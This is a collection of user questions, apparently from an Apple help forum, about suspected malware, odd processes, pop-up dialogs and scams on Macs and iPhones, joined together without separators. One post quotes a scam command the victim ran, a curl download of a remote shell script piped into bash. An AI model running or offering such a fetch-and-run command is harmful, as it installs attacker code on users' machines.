I cannot find anything on this binary - It does seems to function as stated when I use the command to open files, but I never installed it nor do I see it as a default executable in the bin folder of other Macs. Not sure why it exists as a log in item: ![Screenshot of "open" in Login Items ][1] Any ideas? Perhaps part of a .pkg that came with something else?

When running netstat I noticed the suspicious name blackjack. I wonder if it's malware.

PROMPT> netstat -v
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)     rhiwat shiwat    pid   epid  state    options
tcp6       0      0  nameofmachine.local.blackjack fe80::c55b:ddf6:.13569 ESTABLISHED 131072 131072    476      0 0x0102 0x00000204
tcp6       0      0  nameofmachine.local.1024      fe80::c55b:ddf6:.1024  ESTABLISHED 131072 131072    476      0 0x0102 0x00000204

Looking up the pid 476

PROMPT> ps ax | grep 476
476   ??  S      0:19.94 /System/Library/PrivateFrameworks/IDS.framework/identityservicesd.app/Contents/MacOS/identityservicesd

So the process that owns the address seems to be identityservicesd.app, which is an Apple process. This is where my trail ends. There are other mentions of .blackjack occurring on macOS, see [this unanswered Reddit question](https://www.reddit.com/r/HomeNetworking/comments/cmj92b/blackjack_when_running_netstat/) . ### Question: What is it? Malware?

My sister has been complaining that her MacBook Pro is irregularly slow and I suspect there might be a virus on it however Avira is not detecting anything. I realize this is really vague and I may have to just wipe it and put a clean OS on it and all but I don’t want to go through all that work if I don’t have to. Where are the places to look to physically find malicious files on the macOS file system?

Over the last couple of days, I’ve repeatedly had a dialog box appear for a fraction of a second and then disappear, much too quickly to read the contents. It’s happened maybe 4 or 5 times so far; it comes unexpectedly, not apparently prompted by any action I’ve taken; I’ve been in Safari each time it happened, but on different websites, and it’s seemed more like another application momentarily stealing focus rather something from Safari or an open website (e.g. it appears centered on the whole screen, not on the Safari window); I spend much of my time working in webapps, so being in Safari just by chance each time isn’t unexpected. It’s occurred on two different devices (home laptop and office desktop), running different Mac OS versions (Ventura 13.6.1 and Sonoma 14.1.1), but under the same Apple ID. **How can I even begin to diagnose this?** As I understand from Googling around, such flash-up dialogue boxes can sometimes be caused by malware, but equally by legitimate software (e.g. auto-updaters for installed applications). I’ve done the most basic safeguards against malware (all OS security updates installed; checked that all listed login items + background items appear legitimate), and found no red flags. But I’d really like to know what’s going on! Is there a log file where I can check through recently-appeared windows/dialogs, active apps, etc, or anything like that?

As far as I can tell it just appeared, ie it was sitting there, when I woke this M2Max mbp this morning, fairly sure it was not there last night. Disturbingly I can't find a matching xip file if it was some sort of browser download, and there's nothing in browser download history. Cannot google any recent history on this sort of thing, and it seemingly looks like an MS-DOS file/folder/something. The two inner folders are just empty. Sequoia 15.2 (24C101) Notice there's a doubly-dot hidden file with some stuff .. How can I tell if this is a sign of malicious compromise of my system?

Starting this evening, a modal window keeps popping up on my Macbook every 5 seconds warning me that the "Docker" file on my machine is malware and it should be removed. Even when I click "Move to Trash", the modal just comes back after a brief pause. See: However, it doesn't tell me the location of this file on my disk! There is currently no such file in the Applications folder. I uninstalled Docker long ago. When I try to search for the file using sudo find / -name Docker, nothing comes up exept a bunch of operation not permitted errors of this form: find: /System/Volumes/Data/Users/saqib/Library/Containers/com.apple.mail: Operation not permitted find: /System/Volumes/Data/Users/saqib/Library/Containers/com.apple.MobileSMS: Operation not permitted find: /System/Volumes/Data/Users/saqib/Library/Containers/com.apple.Notes: Operation not permitted Below is the information about my MacBook: How can I fix this problem? It is making my macbook unusable.

What is Application Manager for macOS, and what does it do? And how can I find out what kinds of "changes" it's trying to make? It's pretty generic, offering no description of what the changes consist of. Is a user expected to know what this means? Because if we must allow or deny based only on a gut feeling, with no detailed information, I don't think that such a prompt can be considered an effective security measure. But first, I don't know what "Application Manager" even is. I get search results like: "What does an application manager do - roles and responsibilities" ...nothing Mac related. It makes me wonder if this is malware with a generic (but plausible-sounding) name, or an obscure background process of macOS. Additional findings = After using **Xcode** as bmike helpfully suggested, I was able to get the following information about the pop-up window: Advanced - | | | | --- | --- | | Activation Point | x=2105 y=1014 | | Automation Type | Window | | Cancel Button | Cancel (button) [NSButtonCell] | | Children | 8 items | | Children in Navigation Order | 8 items | | Close Button | (close button) [_NSThemeCloseWidgetCell] | | Default Button | OK (button) [NSButtonCell] | | Document | None | | Keyboard Focused | False | | Frame | x=2095 y=1000 w=258 h=305 | | Full Screen | 0 | | Full Screen Button | None | | Grow Area | None | | Main | True | | Minimize Button | (minimize button) [_NSThemeWidgetCell] | | Minimized | False | | Modal | False | | **Parent** | **SecurityAgent (application) [SFAgentApp]** | | Position | x=2095 y=1000 | | Proxy | None | | Role | AXWindow | | Sections | 1 item | | Size | w=258 h=305 | | Subrole | AXStandardWindow | | Title UIElement | None | | Toolbar Button | None | | Zoom Button | (zoom button) [_NSThemeZoomWidgetCell] | Element - Class: SFAuthenticationWindow Hierarchy - ⏷ SecurityAgent (application) [SFAgentApp] ⏷ Untitled (standard window) [SFAuthenticationWindow] (image) [NSImageCell] Application Manager (text) [NSTextFieldCell] Application Manager wants to make changes. (text) [NSTextFieldCell] Enter your password to allow this. (text) [NSTextFieldCell] (text field) [NSTextFieldCell] (secure text field) [NSTextFieldCell] Cancel (button) [NSButtonCell] OK (button) [NSButtonCell] So now we know the parent is an app named **SecurityAgent**. Let's try to find out more... Searching "SecurityAgent" within Activity Monitor does reveal one process with that name. In my case it has written 0 bytes, and read 2.7MB. Not many helpful details are listed. In Terminal, I searched mdfind "SecurityAgent" This produced the following results: /usr/share/man/man8/SecurityAgent.8 /System/Library/Frameworks/Security.framework/Versions/A/MachServices/SecurityAgent.bundle /System/Library/CoreServices/SecurityAgentPlugins /Library/Developer/CommandLineTools/SDKs/MacOSX12.1.sdk/usr/share/man/man8/SecurityAgent.8 /Library/Developer/CommandLineTools/SDKs/MacOSX12.3.sdk/usr/share/man/man8/SecurityAgent.8 /Library/Developer/CommandLineTools/SDKs/MacOSX13.1.sdk/usr/share/man/man8/SecurityAgent.8 /Library/Developer/CommandLineTools/SDKs/MacOSX11.3.sdk/usr/share/man/man8/SecurityAgent.8 /Library/Developer/CommandLineTools/SDKs/MacOSX12.3.sdk/System/Library/Frameworks/SecurityInterface.framework/Versions/A/Headers/SFAuthorizationPluginView.h /Library/Developer/CommandLineTools/SDKs/MacOSX13.1.sdk/System/Library/Frameworks/SecurityInterface.framework/Versions/A/Headers/SFAuthorizationPluginView.h /Library/Security/SecurityAgentPlugins /Library/Developer/CommandLineTools/SDKs/MacOSX11.3.sdk/System/Library/Frameworks/SecurityInterface.framework/Versions/A/Headers/SFAuthorizationPluginView.h /Library/Developer/CommandLineTools/SDKs/MacOSX12.1.sdk/System/Library/Frameworks/SecurityInterface.framework/Versions/A/Headers/SFAuthorizationPluginView.h This adds to the confusion, because it appears to be related to CommandLineTools, which is developed by Apple. But it could also be a deliberate deception. It's still inconclusive. As [this answer](https://apple.stackexchange.com/a/302061) explains, a list of Process IDs *and* their Parent Process IDs can be obtained using the command: ps auxc -o ppid If the list it returns is long, paste it into a text editor and search for the Process name or PID. In my case this gave: | USER | PID | %CPU | %MEM | VSZ | RSS | TT | STAT | STARTED | TIME | COMMAND | PPID | | --- | --- | --- | --- | --- | --- | ---| --- | --- | --- | --- | --- | | user | 614 | 0.0 | 0.2 | 34353248 | 30836 | ?? | S | 9:10AM | 0:00.77 | SecurityAgent | 1 | Note the rightmost column showing a **PPID** of 1, which would be launchd. launchd is the first process launched after the kernel. Can it be said that a process launched by launchd has more credibility or trustworthiness than one launched by another process? I do not know. There are still some questions.

A few minutes ago, after unlocking my phone (iPhone 4, iOS 7.0.1) I got a dialog over the home screen: > Passcode Requirement >---- > You must change your passcode within 60 minutes and it offered to let me do so. I canceled. I've never seen this dialog before and I am worried it may be a sign of malware fishing for my passcode. Even on iOS 9.1, this dialog still happens : There is very little on Google about this message, but what there is is: * Someone else worried it may be malware , with no definitive answer (just "it can't be malware if it is not jailbroken", which is not true) * Someone suggesting the passcode may be "too common" (IMO, unlikely for mine.) * In both the above, a suggestion it may be related to a network profile, which I do not and never have had. I changed my passcode manually, but am still worried about the source of the dialog and why it appeared. Is there a definitive answer?

My Little Snitch just told me that mDNSResponder tried to accept an incoming connection from an external IP (50.118.162.211). I blocked the request. I understand that mDNSResponder is part of Bonjour, ie for discovery of devices on my local network. So I’m confused as to why I would see an external IP. A whois check for that IP [returns](https://dnschecker.org/ip-whois-lookup.php?query=50.118.162.211) a company called EGIHosting and another called Detect Network Inc in San Jose, CA – a company ostensibly involved in Covid testing. Should I be worried? Virus, spyware…

Found this new process TrialArchivingService that was using a lot of cpu. It was started by user. Has anyone else seen this process. All input is welcome. OS - Monterey 12.3 Thanks, M

In my Screen Time on my Apple account, I'm seeing 24 hours a day over the last few weeks of accessing "https://ybb-network.com/ ". Screen Time confirms this is coming from my Mac Laptop. I assume this is some kind of malware. Any suggestions on how to find the source of the malware and remove it? Obviously I'd love to find the true source of the problem. UPDATE: I downloaded the free trial of Malwarebytes, based on the recommendations here and after reading in several places that it's a trustworthy app. It found a few "threats" in its scan: I pressed the "quarantine" button on these, and I checked my browser extensions in Safari and Chrome, but I'm not seeing anything suspicious. Any other advice on how to remove them?

I'd like to check my processes and see if any are suspicious ones. I could Google every single one, but starting with a list of known macOS processes would be super helpful. This list would have processes like kernel_task in it, possibly even with a description. Here's an example list generated by OpenAI, I'm not sure how accurate it is: https://chatgpt.com/share/0cdd2a64-922f-4efb-8fa8-e1dbb1d76f4e Does such a list exist (not AI-generated)?

I was browsing a finance site when I got an alert from my third-party antivirus, now this was NOT a popup on the webpage (fake tech support) or a recommendation via MacOS. My antivirus had actually detected and quarantined 2 malicious JavaScript files within Safari’s cache, they were categorised as ‘Trojan.gen’. I ran Malwarebytes which also detected the same 2 files. I deleted the files, re-run the scans and everything came back clear. XProtect didn’t alert me to any problems. I thought these might have been false positives but decided to run the URL through VirusTotal. Unfortunately 42 security vendors analysis showed the site to be malicious and have malware and detected the below: - GT.JS.Injection.2.1bd84588 - JS/Agent.PHC - javascript.malware.injection - Trojan.JS.SubberWorm - Trojan.Malscript - HEUR.Trojan.Script.Generic I had already deleted the quarantined files so could not upload them to VirusTotal for further checks. Other than browsing the site, I didn’t download any files or click on any prompts/ads. I checked the antivirus activity logs and could see the same JavaScript files had been quarantined from the same site a few days before. I‘ve never had any malware/trojan alerts on a Mac previously. I know Safari is sandboxed but I’m concerned as the files were still detected within the cache. I'm running macOS 14.1.2 build 23B92. I want to know if I should take further actions based on this scenario. Could the malicious cached files have been executed and affected anything outside of Safari?  

First, I feel kind of dumb -- I know *never* to click on questionable links. But a friend* sent me an email message to my iPhone 11 (iOS 17.4.1) with a link to a website with a picture of them. They're reasonably well known, so I thought, well, it could be, so I clicked. Safari brought up a screen saying the site was questionable. For some reason (fatigue?) I clicked on the link that said "show IP address" (I think that is what it said). I clicked on that and Safari showed a blank grey screen and said (as best I remember it) "can't open the site". I don't know, of course, with 100% certainty that this was Safari saying this, or whether it was the spoof site. Safari also offered me (at the top of the screen) the chance to "reduce protection" (I have whatever enhanced protection the latest iOS offers enabled). This is a legitimate thing Safari does sometimes when a site won't load. I don't *believe* I clicked "reduce protection". At that point the blindingly obvious made it's way through to me: that this site was bad. I quickly closed the tab. (The speed with which I did all of this, including backing out of the whole thing, is the reason I'm so vague when I describe my actions above: the whole thing lasted 10 seconds). Clearly this was an attempt to do something questionable to me. I know that on my computer I can run an anti-virus check program. But I have no idea how much risk I am at on my iPhone. And how to check to make sure nothing made its way down to me. Given my memory of what happened, it seems unlikely that anything happened, since it *seems* I never made a full connection to the site. But I can't be sure. Since my entire world is on my phone, I'd like to be sure that all is well. What, if anything, can I do, to make sure all is well. Is there any anti-virus software I should run, or does iOS provide its own protection? I have Apple Pay on the phone. Is there any way to "hack" into that? (Forgive my ignorance -- I am a programmer, so not un-tech-savvy, but cybersecurity and payment schemes are beyond my paygrade). *Narrator: "It wasn't his friend" :-)

Two days ago, I installed [Canon's software](https://downloads.canon.com/webcam/EOSWebcamUtility-MAC1.3.16.pkg.zip) to use my DSLR as a webcam, using the link I found on [this page](https://www.canon-europe.com/cameras/eos-webcam-utility/) . The installer required me to override MacOS' security settings. I did so, thinking that it is required for the extension to access my Canon camera. Now, I inserted a USB drive to my computer and got this request (in French) to allow EOSWebcamUtility to access the external volume. Did I install a malware? Is there a valid reason why I had to manually bypass the security settings during installation? Is there a legitimate reason why this app asks to scan my drives?

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer.

curl -s -O http://REDACTED/pjuWevzu/troubleshoot.sh  && bash troubleshoot.sh

What steps should I take to delete the file and remove any spyware?

My computer was up to some strange things. I used the "last" command to check login activity and this is the result. Not only have I never seen it before this, all of my previous logins were missing, as you can see.

Last login: Wed Aug  3 03:35:37 on ttys001
/Library/Application\ Support/Apple/Remote\ Desktop/Notify
 ; exit; 
Jason@workstation ~ % /Library/Application\ Support/Apple/Remote\ Desktop/Notify
 ; exit;

[Process completed]

Is this something I should be concerned about or a sign my machine was compromised or remotely accessed?

I got this alert that has me concerned. If I click Ok, then it appear again. File located here: opt/cprocsp/bin/. After installing the latest OS update all files in that folder has a prefix corrupted. Should I wipe my laptop and reinstall OS?

This morning I received a notification that after visiting some adult websites, 27 viruses have infected my phone (iPhone XR with iOS 17.3), that they would destroy my SIM card and delete my contacts. (I assume to most people that would be laughable). To handle this threat I should install an app named “Spyshield” from the App Store, a link was provided and actually works. So there is an app on the store that tries to get customers through scamming people. I’ve sent one message to apple support. I can’t report them on the App Store because I didn’t download the app. I can’t leave a review for the same reason. What is the best way to make their behavior uneconomical or get their app removed?